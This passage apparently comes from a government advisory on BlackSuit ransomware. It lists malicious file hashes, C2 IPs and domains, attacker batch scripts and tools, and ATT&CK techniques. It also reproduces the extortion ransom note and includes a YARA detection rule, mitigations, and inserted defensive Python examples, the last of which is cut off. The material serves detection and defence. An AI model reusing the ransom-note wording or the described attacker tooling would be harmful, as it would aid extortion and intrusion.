PowerTool64.exe | (not provided) | Hacktool
aaa.exe | C4A2227CD8D85128EAFEF8EE2298AA105DA892C8B0F37405667C2D1647C35C46 | Encryptor
aaa.exe | 8d16a23d5a5630502b09c33fbc571d2261c6c98fecc3a79a1e1129354f930d0a | (not provided)
Wen.exe | 01ce9cfebb29596d0ab7c99e8dbadf1a8409750b183e6bf73e0de021b365be13 | (not provided)
etmc.exe | a0a4a99948e12309f54911264261d96f0e40d5fd695bab82e95fbc1f9024482e | (not provided)
svchost.exe | 9bbc9784ce3c818a127debfe710ec6ce21e7c9dd0daf4e30b8506a6dba533db4 | Data Exfiltration Tool – Renamed version of RClone.exe
locker_N1uYkmEsfoHmT4lK66trUjBuy5gyAj7n.ex_ | 146335b1be627318ac09476f0c8f8e6e027805e6077673f72d6dce1677a24c78 | (not provided)
socks32.exe | 9493b512d7d15510ebee5b300c55b67f9f2ff1dda64bddc99ba8ba5024113300 | (not provided)
C:\users\Administrator\AppData\Local\msa.ps1 | (not provided) | SystemBC backdoor
%APPDATA%\Zoom\Alternative Workplace Strategies.js | E813F8FAF3AA2EB20E285596413F5088B2D7FD153FE9F72F3FF45735D0FDDCED | Gootloader infection
C:\Users\Public\socks.ps1 | 25A6F82936134A6C5C0066F382530B9D6BF2C8DA6FEAFE028F166B1A9D7283CF | PowerShell Backdoor
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run (Value == socks_powershell) | (not provided) | Executes socks.ps1 on reboot
share$.zip | e3d7c012040962acd66f395d1c5c5f73f305aa1058f2111e8e37d9cb213b80c4 | Contains _COPY.bat, PsExec.exe, etmc.exe, and _EXEC.bat to deploy encryptor (etmc.exe) across environment using domain admin credentials
socss.exe | C798B2690C5F16EB2917A679AF3117CFE9C7060FA8BC84FFC3159338EF33508E | Malware
qq.exe | 3c8c1b1f53e0767b7291bb1ae605ffa62a93e9c8cc783e4ca47ac84b48320d59 | (not provided)
gomer.exe | (not provided) | A renamed executable of GMER used for defense evasion
288-csrss.exe | ee6ec2810910c6d2a2957f041edd1e39dca4266a1cc8009ae6d7315aba9196f5 | (not provided)
372-winlogon.exe | 68c57daed0e5899c49b827042bcf3bbeba33b524bd83315a44d889721664dc34 | (not provided)
776-svchost.exe | bbb7404419f91f82cedfec915931a9339f04165b27d8878d63827c9ee421ed62 | (not provided)
Exe.exe, aaaa.exe, qq.exe | 338228a3e79f3993abc102cbac2ff253c84965213d59ac30892538cdd9b0a22b | Ransomware file
Mwntv.sys | 6332f189cc71df646ff0f1b9b02a005c9ebda3fe7b9712976660746913b030de | Potential Tool Ingress
Un_A.exe | (not provided) | Malicious binary for attempting to disable/uninstall security software
Un_B.erxe | (not provided) | Malicious binary for attempting to disable/uninstall security software

Table 11: Batch Script Tools Used by BlackSuit Ransomware Operators and Hash Values

Filename | Description | Hash Value – SHA-256
2.bat | Batch Script to copy and execute encryptor | 3041dfc13f356c2f0133a9c11a258f87cb7de1e17bc435e9b623d74bc5e1c6be
C:\share$\_EXEC.bat | Execute encrypter | 8F87A1542EE790623896BBAAB933D1883484DE02A7B3D65D6C791D50173A923D
fstart.bat | A batch script used to enable remote services, perform anti-forensics, and enable clear-text passwords in memory | (not provided)
NLA.bat | A batch script used to disable Network Level Authentication (NLA) for Remote Desktop Services (RDS) | (not provided)
av.bat | A batch script that searches for presence of an application and uninstalls it | (not provided)
systeminfo.bat | A batch script used for system enumeration | (not provided)
mv.bat | A batch script used to move the PsExec executable and delete the netscan executable | (not provided)

Table 12: IP addresses from BlackSuit Ransomware Deployments (from November 2023 to July 2024)

IP Address | Time Range of Use | Description
4.231.128[.]59 | July 2024 | IP associated to reverse lookup from Socss.exe
2.18.121[.]83 | July 2024 | IP associated to reverse lookup from Socss.exe
40.126.31[.]73 | July 2024 | IP associated to reverse lookup from Socss.exe
20.114.59[.]183 | July 2024 | IP associated to reverse lookup from Socss.exe
20.242.39[.]171 | July 2024 | IP associated to reverse lookup from Socss.exe
93.184.221[.]240 | July 2024 | IP associated to reverse lookup from Socss.exe
2.18.121[.]197 | July 2024 | IP associated to reverse lookup from Socss.exe
52.111.229[.]19 | July 2024 | IP associated to reverse lookup from Socss.exe
217.20.59[.]36 | July 2024 | IP associated to reverse lookup from Socss.exe
40.79.189[.]58 | July 2024 | IP associated to reverse lookup from Socss.exe
143[.]244[.]146[.]183:443 | May 2024 | Unknown C2 – potential SOCKS Proxy
45[.]141[.]87[.]218:9000 | May 2024 | Arechclient2 Backdoor/SecTopRAT
45[.]141[.]87[.]218:443 | May 2024 | Arechclient2 Backdoor/SecTopRAT
184.174.96[.]16 | May 2024 | Associated with download of the binary vm.dll
89.251.22[.]32 | May 2024 | Cobalt Strike
135.148.67[.]84 | May 2024 | Resolves to domain turnovercheck[.]com
180.131.145[.]85 | May 2024 | Associated with malicious PowerShell execution
180.131.145[.]61 | May 2024 | SystemBC Command & Control
138.199.53[.]226 | Feb 2024 | (not provided)
184.166.211[.]74 | Feb 2024 | (not provided)
185.190.24[.]103 | Feb 2024 | (not provided)
5.181.234[.]58 | Feb 2024 | (not provided)
137.220.61[.]94 | Nov – Feb 2024 | Connecting outbound from Socss.exe
193.37.69[.]116 | Nov – Jan 2024 | Associated with exfiltration
144.202.120[.]122 | Nov 2023 | socks1.ps1 backdoor; SystemBC Backdoor C2; www.recruitment-interview[.]org (C2 SystemBC)
104.21.58[.]219:443 | Nov 2023 | Cobalt Strike
141.98.80[.]181:80 | Nov 2023 | Cobalt Strike
144.202.120[.]122:433 | Nov 2023 | PowerShell Reverse Proxy
155.138.150[.]236:8088 | Nov 2023 | PowerShell Reverse Proxy
140.82.18[.]48 | Nov 2023 | (not provided)
141.98.80[.]181 | Nov 2023 | (not provided)
44.202.120[.]122 | Nov 2023 | (not provided)
45.76.225[.]156 | Nov 2023 | (not provided)
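The disclaimer above says these IPs were malicious only inside the listed time window and should be investigated rather than blocked outright. The following Python is an added example, not part of the advisory: it refangs a few Table 12 rows, matches them against constructed firewall log lines (the log format, timestamps and the 10.0.0.x/198.51.100.7 addresses are assumptions), and downgrades hits that fall outside the observed window.

```python
"""Added example, not part of the advisory: triage constructed firewall log
lines against a few Table 12 indicators while honouring the IOC disclaimer,
i.e. an IP was observed malicious only inside a time window, so a hit there
is flagged for investigation and a hit outside it is reported at lower
confidence instead of being blocked blindly."""
import re
from dataclasses import dataclass
from datetime import date


def refang(ioc: str) -> str:
    """Convert the advisory's defanged notation (1.2.3[.]4, host[.]tld) to a plain value."""
    return ioc.replace("[.]", ".")


@dataclass(frozen=True)
class Indicator:
    value: str        # IP, optionally with :port, exactly as the advisory lists it
    first: date       # first day of the observed-use window
    last: date        # last day of the observed-use window
    description: str


# Four rows transcribed from Table 12; months expanded to calendar ranges and
# "Nov" read as November 2023 per the table title (an assumption).
INDICATORS = [
    Indicator(refang("89.251.22[.]32"), date(2024, 5, 1), date(2024, 5, 31), "Cobalt Strike"),
    Indicator(refang("180.131.145[.]61"), date(2024, 5, 1), date(2024, 5, 31), "SystemBC Command & Control"),
    Indicator(refang("137.220.61[.]94"), date(2023, 11, 1), date(2024, 2, 29), "Connecting outbound from Socss.exe"),
    Indicator(refang("104.21.58[.]219:443"), date(2023, 11, 1), date(2023, 11, 30), "Cobalt Strike"),
]

# Constructed log format: ISO timestamp followed by key=value fields.
LOG_RE = re.compile(
    r"^(?P<day>\d{4}-\d{2}-\d{2})T\S+\s+src=(?P<src>\S+)\s+dst=(?P<dst>\S+)\s+dport=(?P<dport>\d+)"
)


def match_line(line: str):
    """Return a triage record when the destination matches an indicator, else None.
    A port-qualified indicator (ip:port) only matches when the port agrees too."""
    m = LOG_RE.match(line)
    if not m:
        return None
    day = date.fromisoformat(m["day"])
    for ind in INDICATORS:
        ip, _, port = ind.value.partition(":")
        if m["dst"] != ip or (port and port != m["dport"]):
            continue
        in_window = ind.first <= day <= ind.last
        return {
            "dst": ip,
            "dport": m["dport"],
            "day": m["day"],
            "description": ind.description,
            # Inside the window: investigate the source host. Outside it the IP may
            # have been reassigned or used legitimately, so report at lower confidence.
            "verdict": "investigate" if in_window else "low-confidence (outside observed window)",
        }
    return None


def triage(lines):
    """Run every line through match_line and keep only the hits, in input order."""
    return [rec for rec in map(match_line, lines) if rec]


# Constructed sample traffic; 198.51.100.7 is documentation address space, not an IoC.
SAMPLE_LOGS = [
    "2024-05-14T10:22:31Z src=10.0.0.5 dst=89.251.22.32 dport=443 action=allow",
    "2024-05-14T10:23:05Z src=10.0.0.5 dst=198.51.100.7 dport=443 action=allow",
    "2023-11-20T03:10:00Z src=10.0.0.8 dst=104.21.58.219 dport=80 action=allow",
    "2023-11-20T03:11:00Z src=10.0.0.8 dst=104.21.58.219 dport=443 action=allow",
    "2024-08-02T08:01:00Z src=10.0.0.9 dst=137.220.61.94 dport=443 action=allow",
]

if __name__ == "__main__":
    for rec in triage(SAMPLE_LOGS):
        print(rec)
```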

Table 13: Legitimate Files and Tools Used by Black Suit Ransomware (1 of 3)

File name | Hash Value – SHA-256 | Description
share.exe | f02af8ffc37d1874b971307fdec80e33e583b56d9ebabda78a4b8ad038bc3bf0 | Cobalt Strike
181.exe | b028eaa0ec452c6844881dc34be813834813a40591b89ea9a57dd4fb4084e477 | Cobalt Strike – File name
222wqc.exe | ae724dce252c7b05a84bc264993172cf86950d22744b5e3a1b15ba645d9d3733 | Cobalt Strike
gmer.exe | (not provided) | GMER / Rootkit Hunter
PowerTool64.exe | (not provided) | PowerTool64 for hacking
Psexesvc.exe | 141b2190f51397dbd0dfde0e3904b264c91b6f81febc823ff0c33da980b69944 | Sysinternals
Socks5.ps1, Socks.ps1 | 25a6f82936134a6c5c0066f382530b9d6bf2c8da6feafe028f166b1a9d7283cf | PowerShell Reverse Proxy
netscan.exe | (not provided) | A network reconnaissance tool
3iSDtcX.exe | e87512ea12288acec611cf8e995c4ced3971d9e35c0c5dcfd9ee17c9e3ed913d | Putty suite
File.exe | f805dafb3c0b7e18aa7d8c96db8e8d4e9301ff619622d1aecc8080e0ecd9ebbe | Putty.exe. Possibly used for C2
Mwntv.sys | 6332f189cc71df646ff0f1b9b02a005c9ebda3fe7b9712976660746913b030de | Potential Tool Ingress
AnyDesk | 1cdafbe519f60aaadb4a92e266fff709129f86f0c9ee595c45499c66092e0499 | Potential remote access tool
ScreenConnect | 420db40d26d309d3dba3245abb91207f1bca050530545a8048f856e5840d22a2 | Potential remote access tool
SharpShares.exe | (not provided) | Enumerate network shares
Networx.exe | (not provided) | Bandwidth utilization

Table 14: Legitimate Files and Tools Used by Black Suit Ransomware (2 of 3)

Filename | Hash Value – SHA-1 | Description
181[.]exe | 790d40cd16fb458bf99e3600bce29eca06d40b56 | Cobalt Strike – Host name

Table 15: Legitimate Files and Tools Used by Black Suit Ransomware (3 of 3)

Filename | File Path | Description
Anydesk.exe | C:\Program Files(x86)\AnyDesk\AnyDesk.exe | Remote Monitoring and Management (RMM) Tool
ehorus_display.exe | C:\Program Files\ehorus_agent\ehorus_display\ehorus_display.exe | RMM Tool
ehorus_launcher.exe | C:\Program Files\ehorus_agent\ehorus_launcher.exe | RMM Tool

Table 16: Domain(s) associated to BlackSuit Ransomware

Domain Name | Description
Abbeymathiass[.]com | Cobalt Strike C2
Mail.abbeymathiass[.]com | Cobalt Strike C2
Store.abbeymathiass[.]com | Cobalt Strike C2
https://file[.]io/ScPd1KcJTtxO | Associated with download of the binary disabler.exe by threat actors
Mail.turnovercheck[.]com | Cobalt Strike C2
Store.turnovercheck[.]com | Cobalt Strike C2
turnovercheck[.]com | Cobalt Strike C2
Hourlyprofitstore[.]com | Cobalt Strike
IPs and Domains for downloads / C2 / exfiltration of communication | https://protect-us.mimecast[.]com/s/A2PyC31xN5IpzR0XUvzaAj?domain=5.181.157.8; https://protect-us.mimecast[.]com/s/CcsrC4xyO7fBK73ztjNfPl?domain=5.181.234.58; https://protect-us.mimecast[.]com/s/NwueC5yzP5IZLW4MulfSrc?domain=137.220.61.94; https://protect-us.mimecast[.]com/s/T3InC2kwM5hpzEOVU9S5zn?domain=147.135.36.162; https://protect-us.mimecast[.]com/s/teBrC1wvL8iMNE56tXga0n?domain=147.135.11.223

Table 17: BlackSuit Ransomware Note and Hash Value

File Name | Hash Value | Description
readme.BlackSuit.txt | 1743494f803bbcbd11150a4a8b7a2c5faba1223da607f67d24b18ca2d95d5ba3 | Ransomware note


RANSOM NOTE (NEW AUGUST 7, 2024)

Figure 1 shows the observed BlackSuit ransom notes delivered to victims.

Figure 1. BlackSuit Ransom Note

Your safety service did a really poor job of protecting your files against our
professionals.

Extortioner named BlackSuit has attacked your system.

As a result all your essential files were encrypted and saved at a secure server
for further use and publishing on the Web into the public realm.

Now we have all your files like: financial reports, intellectual property,
accounting, law actions and complaints, personal files and so on and so forth. 

We are able to solve this problem in one touch.

We (BlackSuit) are ready to give you an opportunity to get all the things back
if you agree to make a deal with us.

You have a chance to get rid of all possible financial, legal, insurance and
many others risks and problems for a quite small compensation.

You can have a safety review of your systems.

All your files will be decrypted, your data will be reset, your systems will
stay in safe.

Contact us through TOR browser using the link:


MITRE ATT&CK TACTICS AND TECHNIQUES

See Table 18 through Table 23 for all referenced threat actor tactics and
techniques in this advisory, as well as corresponding detection and/or
mitigation recommendations. For additional mitigations, see the Mitigations
section.

Table 18: BlackSuit Actors ATT&CK Techniques for Resource Development

Technique Title | ID | Use
Acquire Access | T1650 | BlackSuit actors may leverage brokers in support of gaining initial access.

Table 19: Cyber Threat Actors ATT&CK Techniques for Initial Access

Technique Title | ID | Use
Remote Services: Remote Desktop Protocol | T1021.001 | BlackSuit actors use RDP compromise as a secondary initial access vector.
External Remote Services | T1133 | BlackSuit actors gain initial access through a variety of RMM software.
Exploit Public Facing Application | T1190 | BlackSuit actors gain initial access through public-facing applications.
Phishing | T1566 | BlackSuit actors most commonly gain initial access to victim networks via phishing.
Phishing: Spear phishing Attachment | T1566.001 | BlackSuit actors used malicious PDF document attachments in phishing campaigns.
Phishing: Spear phishing Link | T1566.002 | The actors gain initial access using malvertising links via emails and public-facing sites.

Table 20: Cyber Threat Actors ATT&CK Techniques for Privilege Escalation

Technique Title | ID | Use
(New August 7, 2024) Valid Accounts | T1078 | BlackSuit actors used a legitimate admin account to gain access privileges to the domain controller.
Valid Accounts: Domain Accounts | T1078.002 | BlackSuit actors used encrypted files to create new admin user accounts.

Table 21: Cyber Threat Actors ATT&CK Techniques for Defense Evasion

Technique Title | ID | Use
Remote Services: Remote Desktop Protocol | T1021.001 | BlackSuit actors used valid accounts to move laterally through the domain controller using RDP.
Indicator Removal: Clear Windows Event Logs | T1070.001 | BlackSuit actors deleted shadow files and system and security logs after exfiltration.
Automated Collection | T1119 | BlackSuit actors used registry keys to auto-extract and collect files.
Domain Policy Modification: Group Policy Modification | T1484.001 | BlackSuit actors modified Group Policy Objects to subvert antivirus protocols.
Impair Defenses: Disable or Modify Tools | T1562.001 | BlackSuit actors deactivated antivirus protocols.

Table 22: Cyber Threat Actors ATT&CK Techniques for Command and Control

Technique Title | ID | Use
Ingress Tool Transfer | T1105 | BlackSuit actors used C2 infrastructure to download multiple tools.
Protocol Tunneling | T1572 | BlackSuit actors used an encrypted SSH tunnel to communicate within C2 infrastructure.

Table 23: Cyber Threat Actors ATT&CK Techniques for Impact

Technique Title | ID | Use
Data Encrypted for Impact | T1486 | BlackSuit actors encrypted data to determine which files were being used or blocked by other applications.


DETECTION METHODS

(New August 7, 2024) Reference the YARA rule below to aid in detecting
BlackSuit activity. Note: The YARA rule is derived from FBI investigations and
is not guaranteed to detect confirmed malicious activity.

private rule is_executable {
    condition:
        uint32(uint32(0x3C)) == 0x00004550
}

rule obfuscates_dlls {
    strings:
        // Code for unscrambling names of true DLL imports
        // c6 84 24 ?? 00 00 00 ??    | MOV byte ptr [ESP + ??], ??   (eight times)
        $code_load_obfuscated = {
            c6 84 24 ?? 00 00 00 ??
            c6 84 24 ?? 00 00 00 ??
            c6 84 24 ?? 00 00 00 ??
            c6 84 24 ?? 00 00 00 ??
            c6 84 24 ?? 00 00 00 ??
            c6 84 24 ?? 00 00 00 ??
            c6 84 24 ?? 00 00 00 ??
            c6 84 24 ?? 00 00 00 ??
        }

        // 99          | CDQ
        // f7 ??       | IDIV ??
        // 8d ?? ??    | LEA ??, ??
        // 99          | CDQ
        // f7 ??       | IDIV ??
        // 88          | MOV
        $code_deobfuscate = { 99 f7 ?? 8d ?? ?? 99 f7 ?? 88 }

    condition:
        all of them
}

rule calls_rsa_function {
    strings:
        // Code for function calls using RSA key
        // 8d 4c 24 10      | LEA ECX, [esp + 0x10]
        // 6a ??            | PUSH ??
        // 6a ??            | PUSH ??
        // 51               | PUSH ECX
        // 6a ??            | PUSH ??
        // 6a ??            | PUSH ??
        // 6a ??            | PUSH ??
        // 68 ?? ?? ?? ??   | PUSH (address of RSA string)
        // ff d0            | CALL EAX
        $code_rsa_function_1 = { 8d 4c 24 10 6a ?? 6a ?? 51 6a ?? 6a ?? 6a ?? 68 ?? ?? ?? ?? ff d0 }

        // 8d 4c 24 10      | LEA ECX, [esp + 0x10]
        // 6a ??            | PUSH ??
        // 6a ??            | PUSH ??
        // 51               | PUSH ECX
        // 56               | PUSH ESI
        // 6a ??            | PUSH ??
        // 6a ??            | PUSH ??
        // 68 ?? ?? ?? ??   | PUSH (address of RSA string)
        // ff d0            | CALL EAX
        $code_rsa_function_2 = { 8d 4c 24 10 6a ?? 6a ?? 51 56 6a ?? 6a ?? 68 ?? ?? ?? ?? ff d0 }

    condition:
        any of them
}

rule xor_decoder_functions {
    strings:
        // Functions 402e00 and 402f00 both appear to contain a xor-decoding loop

        // 402e00
        // 0f a4 ce ??      | SHLD ESI, param_1, ??
        // 0f ac d5 ??      | SHRD EBP, EDX, ??
        // c1 e1 ??         | SHL param_1, ??
        // c1 ea ??         | SHR EDX, 0x19
        // 0b cd            | OR param_1, EBP
        // 0b f2            | OR ESI, EDX
        // 99               | CDQ
        // 33 c8            | XOR param_1, EAX
        $code_xor_loop_1 = { 0f a4 ce ?? 0f ac d5 ?? c1 e1 ?? c1 ea ?? 0b cd 0b f2 99 33 c8 }

        // 402f00
        // 0f a4 ce ??      | SHLD ESI, param_1, ??
        // c1 ea ??         | SHR EDX, ??
        // 0b f2            | OR ESI, EDX
        // c1 e1 ??         | SHL param_1, ??
        // 0b c8            | OR param_1, EAX
        // 0f be c3         | MOVSX EAX, BL
        // 8a 1f            | MOV BL, byte ptr [EDI]
        // 99               | CDQ
        // 33 c8            | XOR param_1, EAX
        $code_xor_loop_2 = { 0f a4 ce ?? c1 ea ?? 0b f2 c1 e1 ?? 0b c8 0f be c3 8a 1f 99 33 c8 }

    condition:
        any of them
}

rule win_BlackSuit_manual {
    meta:
        author = "CVH - Raleigh"
        date = "2024-07-12"
        version = "1"
        description = "Detects win.BlackSuit. Rules were manually constructed and results should not be considered conclusive."
        malpedia_reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.BlackSuit"

    strings:
        // Somehow keeps this in plaintext, although in UTF-16
        $string_readme = "readme.BlackSuit.txt" nocase wide ascii

        // RSA key for encrypting AES encryption key present in plaintext
        $string_rsa_key = "BEGIN RSA PUBLIC KEY" nocase wide ascii

        // Unusual debug strings
        $string_debug_1 = ".rdata$voltmd"
        $string_debug_2 = ".rdata$zzzdbg"

        // Relevant function calls
        $import_1 = "MultiByteToWideChar"
        $import_2 = "EnterCriticalSection"
        $import_3 = "GetProcessHeap"

    condition:
        (is_executable and $string_readme)
        or
        ($string_readme and (obfuscates_dlls or calls_rsa_function or xor_decoder_functions))
        or
        2 of (obfuscates_dlls, calls_rsa_function, xor_decoder_functions)
        or
        (1 of (obfuscates_dlls, calls_rsa_function, xor_decoder_functions) and any of them)
}
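To make the rule's primitives concrete, the following Python is an added example (not part of the advisory or of the FBI rule): it re-implements the PE header test from is_executable, a text string with the nocase wide ascii modifiers, and a ?? wildcard hex string such as $code_deobfuscate, then runs them over a constructed byte blob (the stub PE header and byte sequences are assumptions, not a real sample).

```python
"""Added example (not from the advisory or the FBI rule): re-implements three
primitives the YARA rule above relies on, so their semantics can be inspected
on a constructed byte blob rather than a real sample: the PE header test in
is_executable, a text string with the 'nocase wide ascii' modifiers, and a
hex string with '??' wildcards such as $code_deobfuscate."""
import re
import struct


def is_executable(data: bytes) -> bool:
    """Mirror of  uint32(uint32(0x3C)) == 0x00004550 : read e_lfanew from the
    DOS header and check that the PE\\0\\0 signature sits at that offset."""
    if len(data) < 0x40:
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 4 > len(data):
        return False
    return struct.unpack_from("<I", data, e_lfanew)[0] == 0x00004550


def find_string(data: bytes, text: str) -> list:
    """Mirror of a YARA text string with 'nocase wide ascii': match both the
    ASCII form and the UTF-16LE ('wide') form, ignoring ASCII case.
    Returns (form, offset) tuples."""
    hits = []
    for form, enc in (("ascii", "ascii"), ("wide", "utf-16-le")):
        pat = re.compile(re.escape(text.encode(enc)), re.IGNORECASE)
        hits += [(form, m.start()) for m in pat.finditer(data)]
    return hits


def hex_pattern(spec: str) -> "re.Pattern[bytes]":
    """Compile a YARA-style hex string ('99 f7 ?? 8d', or unspaced '8d4c2410')
    into a bytes regex; each '??' is one wildcard byte."""
    parts = []
    for tok in spec.split():
        for i in range(0, len(tok), 2):
            chunk = tok[i:i + 2]
            parts.append(b"." if chunk == "??" else re.escape(bytes([int(chunk, 16)])))
    # DOTALL so a wildcard byte may also be 0x0a
    return re.compile(b"".join(parts), re.DOTALL)


CODE_DEOBFUSCATE = "99 f7 ?? 8d ?? ?? 99 f7 ?? 88"   # $code_deobfuscate from the rule


def build_sample() -> bytes:
    """Constructed blob: stub DOS/PE header, a CDQ/IDIV/LEA byte sequence that
    fits $code_deobfuscate, and the ransom-note filename as UTF-16LE in mixed case."""
    pe_offset = 0x80
    header = bytearray(b"MZ" + b"\x00" * (pe_offset - 2))
    struct.pack_into("<I", header, 0x3C, pe_offset)           # e_lfanew
    header += b"PE\x00\x00" + b"\x00" * 20                     # PE signature + padding
    body = b"\x90" * 16
    body += bytes.fromhex("99 f7 fb 8d 44 24 99 f7 f9 88")     # satisfies the wildcards
    body += b"\x90" * 8
    body += "README.BlackSuit.TXT".encode("utf-16-le")        # only the wide form is present
    return bytes(header) + body


def scan(data: bytes) -> dict:
    """Evaluate the primitives; 'readme_and_pe' is the rule's first clause,
    (is_executable and $string_readme)."""
    readme = find_string(data, "readme.BlackSuit.txt")
    return {
        "is_executable": is_executable(data),
        "string_readme": readme,
        "string_rsa_key": find_string(data, "BEGIN RSA PUBLIC KEY"),
        "code_deobfuscate": [m.start() for m in hex_pattern(CODE_DEOBFUSCATE).finditer(data)],
        "readme_and_pe": is_executable(data) and bool(readme),
    }


if __name__ == "__main__":
    for key, value in scan(build_sample()).items():
        print(f"{key}: {value}")
```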


MITIGATIONS


NETWORK DEFENDERS

The FBI and CISA recommend network defenders implement the mitigations below to
improve your organization’s cybersecurity posture based on BlackSuit actors’
activity. These mitigations align with the Cross-Sector Cybersecurity
Performance Goals (CPGs) developed by CISA and the National Institute of
Standards and Technology (NIST). The CPGs provide a minimum set of practices and
protections that CISA and NIST recommend all organizations implement. CISA and
NIST based the CPGs on existing cybersecurity frameworks and guidance to protect
against the most common and impactful threats, tactics, techniques, and
procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more
information on the CPGs, including additional recommended baseline protections.

 * Implement a recovery plan to maintain and retain multiple copies of sensitive
   or proprietary data and servers in a physically separate, segmented, and
   secure location (i.e., hard drive, storage device, the cloud).
 * Require all accounts with password logins (e.g., service account, admin
   accounts, and domain admin accounts) to comply with National Institute for
   Standards and Technology (NIST) standards for developing and managing
   password policies.
   * Use longer passwords consisting of at least 8 characters and no more than
     64 characters in length;
   * Store passwords in hashed format using industry-recognized password
     managers;
   * Add password user “salts” to shared login credentials;
   * Avoid reusing passwords;
   * Implement multiple failed login attempt account lockouts;
   * Disable password “hints;”
   * Refrain from requiring password changes more frequently than once per
     year. 
   * Note: NIST guidance suggests favoring longer passwords instead of requiring
     regular and frequent password resets. Frequent password resets are more
     likely to result in users developing password “patterns” cyber criminals
     can easily decipher. 
   * Require administrator credentials to install software.
 * Keep all operating systems, software, and firmware up to date [CPG 1.E].
   Timely patching is one of the most efficient and cost-effective steps an
   organization can take to minimize its exposure to cybersecurity threats.
   Prioritize patching known exploited vulnerabilities in internet-facing
   systems.
 * Require Phishing-Resistant multifactor authentication to administrator
   accounts [CPG 2.H], and require standard MFA for all services to the extent
   possible, particularly for webmail, virtual private networks, and accounts
   that access critical systems. 
 * Segment networks [CPG 2.F] to prevent the spread of ransomware. Network
   segmentation can help prevent the spread of ransomware by controlling traffic
   flows between—and access to—various subnetworks and by restricting adversary
   lateral movement. 
 * Identify, detect, and investigate abnormal activity and potential traversal
   of the indicated ransomware with a networking monitoring tool [CPG 3.A]. To
   aid in detecting the ransomware, implement a tool that logs and reports all
   network traffic, including lateral movement activity on a network. Endpoint
   detection and response (EDR) tools are particularly useful for detecting
   lateral connections as they have insight into common and uncommon network
   connections for each host. 
 * Install, regularly update, and enable real time detection for antivirus
   software on all hosts.
 * Implement Secure Logging Collection and Storage Practices [CPG 2.T]. Learn
   more on logging best practices by referencing CISA’s Logging Made Easy
   resources.
 * Review domain controllers, servers, workstations, and active directories for
   new and/or unrecognized accounts.
 * Audit user accounts with administrative privileges and configure access
   controls according to the principle of least privilege.
 * Disable unused ports.
 * Implement and Enforce Email Security Policies [CPG 2.M].
 * Disable Macros by Default [CPG 2.N].
 * Consider adding an email banner to emails received from outside your
   organization.
 * Disable hyperlinks in received emails.
 * Implement time-based access for accounts set at the admin level and higher.
   For example, the Just-in-Time (JIT) access method provisions privileged
   access when needed and can support enforcement of the principle of least
   privilege (as well as the Zero Trust model). This is a process where a
   network-wide policy is set in place to automatically disable admin accounts
   at the Active Directory level when the account is not in direct need.
   Individual users may submit their requests through an automated process that
   grants them access to a specified system for a set timeframe when they need
   to support the completion of a certain task. 
 * Disable command-line and scripting activities and permissions. Privilege
   escalation and lateral movement often depend on software utilities running
   from the command line. If threat actors are not able to run these tools, they
   will have difficulty escalating privileges and/or moving laterally. 
 * Maintain offline backups of data, and regularly test backup and
   restoration procedures [CPG 2.R]. This practice ensures the organization
   will not be severely interrupted by an incident and will not be left with
   only irretrievable data. 
 * Ensure all backup data is encrypted, immutable (i.e., cannot be altered or
   deleted), and covers the entire organization’s data infrastructure.
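
The network-monitoring, unrecognized-account, and admin-audit mitigations above share one underlying analytic: correlate logon telemetry per account and per source host, then flag fan-out across many hosts in a short window and privileged logons by identities nobody approved. The following is an added example of that logic, not code from CISA, the FBI, or this advisory. The event records are constructed for the example and only mirror the fields of Windows Security events 4624 (logon) and 4672 (special privileges assigned); reading real EVTX or SIEM exports is assumed and not shown, and the approved-admin list, window and threshold are assumptions to tune per environment.

```python
"""Flag lateral-movement fan-out and unrecognised privileged logons in
Windows Security event records (added example; constructed data)."""
from collections import defaultdict
from datetime import datetime, timedelta

# Assumption: the only identities that should ever hold administrative
# privileges. Any other account in a 4672 event is worth investigating.
APPROVED_ADMINS = {"CORP\\it-admin01", "CORP\\backup-svc"}

# Logon types that imply a connection from another host:
# 3 = network (SMB, WMI, RPC), 10 = RemoteInteractive (RDP).
NETWORK_LOGON_TYPES = {3, 10}

# Constructed sample: (timestamp, event_id, account, source_host, dest_host, logon_type)
SAMPLE_EVENTS = [
    # Ordinary interactive logon to the user's own workstation.
    ("2024-08-01T09:00:00", 4624, "CORP\\alice", "WS-ALICE", "WS-ALICE", 2),
    # One account reaching five distinct hosts from a workstation in four minutes.
    ("2024-08-01T09:10:00", 4624, "CORP\\svc-scan", "WS-ALICE", "SRV-FILE01", 3),
    ("2024-08-01T09:11:00", 4624, "CORP\\svc-scan", "WS-ALICE", "SRV-FILE02", 3),
    ("2024-08-01T09:12:00", 4624, "CORP\\svc-scan", "WS-ALICE", "SRV-APP01", 3),
    ("2024-08-01T09:13:00", 4624, "CORP\\svc-scan", "WS-ALICE", "DC01", 3),
    ("2024-08-01T09:14:00", 4624, "CORP\\svc-scan", "WS-ALICE", "SRV-DB01", 10),
    # The same account is then granted admin rights on a domain controller.
    ("2024-08-01T09:20:00", 4672, "CORP\\svc-scan", "DC01", "DC01", None),
    # Approved administrator working from the jump host: two hosts, repeated.
    ("2024-08-01T09:30:00", 4624, "CORP\\it-admin01", "JUMP01", "SRV-FILE01", 10),
    ("2024-08-01T09:31:00", 4672, "CORP\\it-admin01", "SRV-FILE01", "SRV-FILE01", None),
    ("2024-08-01T09:35:00", 4624, "CORP\\it-admin01", "JUMP01", "SRV-FILE01", 3),
    ("2024-08-01T09:36:00", 4624, "CORP\\it-admin01", "JUMP01", "SRV-FILE02", 3),
    # Machine and SYSTEM logons routinely carry special privileges; ignored below.
    ("2024-08-01T09:40:00", 4672, "NT AUTHORITY\\SYSTEM", "SRV-APP01", "SRV-APP01", None),
    ("2024-08-01T09:41:00", 4672, "CORP\\SRV-APP01$", "DC01", "DC01", None),
]


def parse_event(raw):
    ts, event_id, account, src, dst, logon_type = raw
    return {"ts": datetime.fromisoformat(ts), "id": event_id, "account": account,
            "src": src, "dst": dst, "logon_type": logon_type}


def detect_fanout(events, window=timedelta(minutes=10), threshold=5):
    """Alert on (account, source host) pairs that reach `threshold` distinct
    destination hosts over network/RDP logons inside any `window`-long span."""
    by_pair = defaultdict(list)
    for e in events:
        if e["id"] == 4624 and e["logon_type"] in NETWORK_LOGON_TYPES and e["src"] != e["dst"]:
            by_pair[(e["account"], e["src"])].append((e["ts"], e["dst"]))
    alerts = []
    for (account, src), logons in by_pair.items():
        logons.sort()
        peak = 0
        for i, (start, _) in enumerate(logons):
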